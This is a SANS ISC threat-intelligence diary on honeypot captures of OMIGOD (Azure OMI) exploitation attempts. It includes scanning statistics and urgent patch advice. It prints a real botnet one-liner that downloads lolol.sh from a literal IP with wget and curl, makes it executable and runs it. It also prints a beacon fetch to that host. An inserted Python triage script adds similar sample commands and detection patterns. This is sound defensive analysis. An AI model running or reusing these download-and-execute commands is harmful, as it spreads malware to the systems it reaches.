
#OMIGOD Exploits Captured in the Wild. Researchers responsible for half of scans for related ports.

Published: 2021-09-20
Last Updated: 2021-09-20 14:07:33 UTC
by Johannes Ullrich (Version: 1)

After the "OMIGOD" vulnerability details were made public, and it became obvious that exploiting vulnerable hosts would be trivial, researchers and attackers started scanning for vulnerable hosts almost immediately. We saw a quick rise in scans, particularly against port 1270. [1]

Some of the attacks originated from research projects that apparently enumerated vulnerable hosts. Scans we have linked to researchers appear so far to scan for the open port and do not send any specific attack payload. But we also see "genuine" exploits of the vulnerability. Azure is probably the most target-rich environment, with more than half of all hosts running Linux. Many of them have the Open Management Interface (OMI) software pre-installed by default. Azure is also leaving it up to the users to patch this software that they may not know is installed. Our data comes from our honeypot network, which is not specifically covering Azure so far. The OMI software may also be installed outside of Azure. It makes sense for attackers to scan the entire internet as hosts outside of Azure may not consider themselves vulnerable.

One exploit that just hit our honeypot (formatted for easier readability)

At this point, all of the exploits we have seen appear to test the vulnerability and do not (yet?) deploy any actual payloads. Others have observed some "Mirai" style payloads being deployed.

Here are the most common commands we see executed (sometimes, the command is Base64 encoded):

wget -O lolol.sh http://103.116.168.68/lolol.sh; curl -o lolol.sh http://103.116.168.68/lolol.sh; chmod 777 lolol.sh; sh lolol.sh

This is a typical botnet propagation command. At the time I looked for it, the lolol.sh script was no longer available, and the URL returned a 404 error.

wget http://103.116.168.68/test1270

I have seen the same command against the other ports associated with "OMI," using different 'test' URLs. The URL is not reachable. Note how the IP is the same as above.

In addition, I have seen some simple requests using "id" or "whoami," the typical checks to confirm that the vulnerability is exploitable.

Interestingly, the 'wget' and 'curl' commands seen in our honeypots all point to a single download IP, but the requests themselves originated from 125 different source IPs just today alone. This appears to be one botnet, and my guess is that right now they are just looking for vulnerable systems (a hit on the above URL would mark the requesting host as vulnerable).
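As an added example (not the diary's or ISC's own tooling), here is a small Python triage script over constructed honeypot records: it decodes Base64-encoded commands, labels each as a recon check, a beacon fetch, or a download-and-execute one-liner of the kinds shown above, and counts distinct source IPs per download host, the measure that points to a single botnet. The record layout and all IP addresses are constructed.

```python
import base64
import binascii
import re
from collections import defaultdict

# Constructed sample honeypot records (not real ISC data): source IP, target
# port, and the command the exploit attempt asked OMI to run (sometimes Base64).
SAMPLE_RECORDS = [
    ("203.0.113.10", 1270, "wget -O lolol.sh http://198.51.100.5/lolol.sh; "
     "curl -o lolol.sh http://198.51.100.5/lolol.sh; chmod 777 lolol.sh; sh lolol.sh"),
    ("203.0.113.11", 5986, base64.b64encode(b"wget http://198.51.100.5/test5986").decode()),
    ("203.0.113.12", 1270, "id"),
    ("203.0.113.13", 5987, "whoami"),
    ("203.0.113.10", 5987, "wget http://198.51.100.5/test5987"),
]
URL_RE = re.compile(r"https?://([^/\s:]+)[^\s;]*")
FETCH_RE = re.compile(r"\b(?:wget|curl)\b")
EXEC_RE = re.compile(r"(?:^|;|&&|\|)\s*(?:sh|bash)\s+\S+")  # the 'sh lolol.sh' stage
RECON_CMDS = {"id", "whoami"}

def decode_command(cmd: str) -> str:
    """Return the plain-text command, decoding it if it arrived Base64-encoded."""
    try:
        text = base64.b64decode(cmd, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return cmd
    # A short plain word can pass as valid Base64 yet decode to junk: keep only readable text.
    return text if all(c.isprintable() or c.isspace() for c in text) else cmd

def classify(plain: str) -> str:
    """Label a decoded command: recon check, beacon, download-and-execute, or other."""
    if plain.strip() in RECON_CMDS:
        return "recon"                 # 'id' / 'whoami' exploitability checks
    if FETCH_RE.search(plain) and EXEC_RE.search(plain):
        return "download-and-execute"  # classic botnet propagation one-liner
    if FETCH_RE.search(plain):
        return "beacon"                # fetch only: a hit on the URL marks the host vulnerable
    return "other"

def summarize(records):
    """Distinct source IPs per download host, plus a count per command class."""
    sources_per_host = defaultdict(set)
    classes = defaultdict(int)
    for src, _port, cmd in records:
        plain = decode_command(cmd)
        classes[classify(plain)] += 1
        for m in URL_RE.finditer(plain):
            sources_per_host[m.group(1)].add(src)
    return {h: len(s) for h, s in sources_per_host.items()}, dict(classes)
```

On the sample, every download URL resolves to one host while the requests come from several sources, which is the pattern the diary describes for one botnet probing many targets.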

As far as scans against related ports (port 1270, port 5986, port 5987), below is a graph of the targets seeing scans on these ports:


It is interesting that the scans slowly increased in September, before the vulnerability was announced; that is something that needs a bit more time to look into.

Almost exactly half of the scans to these ports come from researchers. The "Stretchoid" network appears to be the most active, but others like Shodan, Internet Census, Onyphe, Cyber.casa, Internettl and so on are participating. Not all of these typically publish results, but for those that do, expect a lot of identical papers/news releases soon with headlines like "1000's of exposed hosts found vulnerable to OMIGOD" (if they didn't find much) or "10s of 1000s of exposed hosts found vulnerable to OMIGOD" (if they found more).

So far, there is a lot of recon happening. But this is a MUST PATCH NOW vulnerability, and if you are finding an exposed host inside Azure running OMI, assume compromise.

[1] https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Keywords: azure linux omi omigod